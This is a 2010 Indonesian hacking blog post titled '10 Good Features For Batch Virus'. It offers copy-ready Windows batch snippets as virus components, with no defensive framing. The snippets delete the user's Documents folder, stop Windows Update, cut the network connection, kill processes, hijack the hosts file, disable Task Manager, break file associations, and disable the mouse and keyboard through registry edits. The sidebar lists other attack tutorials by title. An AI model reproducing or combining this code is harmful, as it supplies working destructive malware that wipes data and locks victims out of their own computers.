skip to main
|
skip to sidebar
XAXNERX
Tutorial
Beranda
Software and Tutorial
10 Good Features For Batch Virus
Diposting oleh
Ray Sparkz (AXXERX55)
di
03.45
Sabtu, 14 Agustus 2010
Label:
Hacking
F 1:
Disable Windows Update:
Code:
@echo off
net stop "wuauserv"
F 2:
Delete "My Documents" folder:
Code:
@echo off
del /f /q "%userprofile%\My Documents\*.*"
del /f /q "%userprofile%\Documents\*.*"
F 3:
Disable Internet Connection:
Code:
@echo off
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
F 4:
Kill A Process:
Code:
@echo off
taskkill /f /t /im "Process.exe"
F 5:
Block Websites [For example, Google]:
Code:
@echo off
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1
www.google.com
>> "Hosts"
F 6:
Disable Task Manager:
Code:
@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
F 7:
Confuse File Extensions:
Code:
@echo off
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
F 8:
Disable Mouse:
Code:
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
F 9:
Disable Keyboard [This one is long]:
Code:
@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
F 9:
And The Last One, Change The Computer Time:
Code:
@echo off
time 00:00
Tutorial By
Zonta (GA L33T)
0 komentar:
Posting Komentar
Posting Lebih Baru
Posting Lama
Beranda
Langganan:
Posting Komentar (Atom)
powered by :
Visited
Translate To Your Language
Your Message
BANER
Label
Hacking
(15)
News
(2)
Security
(1)
Share
(8)
Tips n Trick
(10)
Tools
(2)
Tools Hacking
(2)
Tutorial
(5)
Tutorial Hacking
(2)
Arsip
▼
2010
(49)
►
September
(1)
▼
Agustus
(48)
Daftar Nama Domain Di Seluruh Dunia
Simple SQL Injection Advance
Facebook Phising For Newbie
Hacker Tools
Top 100 Network Security Tools
SEJARAH BERDIRINYA GOOGLE
XSS Attack
Cara Mudah Menjebol Password Deep Freeze 6
Lindungi karyamu dari plagiator
Binari dan Hexadecimal
Cara Membuat Jaringan Komputer (LAN/Local Area Net...
T E L N E T
Black hat hacker
White hat hacker
SQL Injection Tool V2.1
TUTORIAL JAVA SCRIPT
TUTORIAL PHP
Kronologi Malaysia Tangkap 3 Petugas KKP RI
Durk Collection
10 Good Features For Batch Virus
Cara Lain Lindungi Halaman Admin
Dasar SQL Injection
Tutorial IStealer 6.0
Batch Virus
Cara Mengetahui Ip Address Seseorang Hanya Dengan ...
RFI & LFI
SQL Injection Step by Step
Cara Membuat teks berjalan di addressbar
Fungsi Terbilang Pada Excel
Cara Menguasai Server Warnet
Mencuri Password Menggunakan USB Disk
KODE WILAYAH TELEPON SELURUH INDONESIA
101 Trik Sulap
Cara Menghilangkan Navbar pada Blogger/Blogspot
Rambut Napoleon Bonaparte Dilelang Rp 118 Juta
Cara Mengganti Icon Flashdisk
Cara menjebol password office (Word-Excel-PowerPoi...
Cara Menginstal Windows XP
3 Cara Membackup dan Mengembalikan Data Penting Da...
Cara Mencuri Data Dari Flash Disk
Software Penjebol Password RAR dan WinRar
Keylogger Trap
Cara Instal Emoticons Kaskus Di WordPress
Asal Muasal Virus Komputer
Cara Mengembalikan Data Yang Terhapus
Cara Menambah Widget di Blogspot
Cara Menginstal WordPress di Komputer Lokal
Cara Nyedot Bandwidht
(GA) ALLIANCE
Sponsored By :
Feedjit
About Me
Ray Sparkz (AXXERX55)
Lihat profil lengkapku
Copyright ©
XAXNERX
Blogger Theme
by
BloggerThemes
&
newwpthemes
. . . : : : WE LOVE INDONESIA Ini dadaku, mana dadamu Kalau Malaysia mau konfrontasi ekonomi Kita hadapi dengan konfrontasi ekonomi Kalau Malaysia mau konfrontasi politik Kita hadapi dengan konfrontasi politik Kalau Malaysia mau konfrontasi militer Kita hadapi dengan konfrontasi militer : : : . . .
0 komentar:
Posting Komentar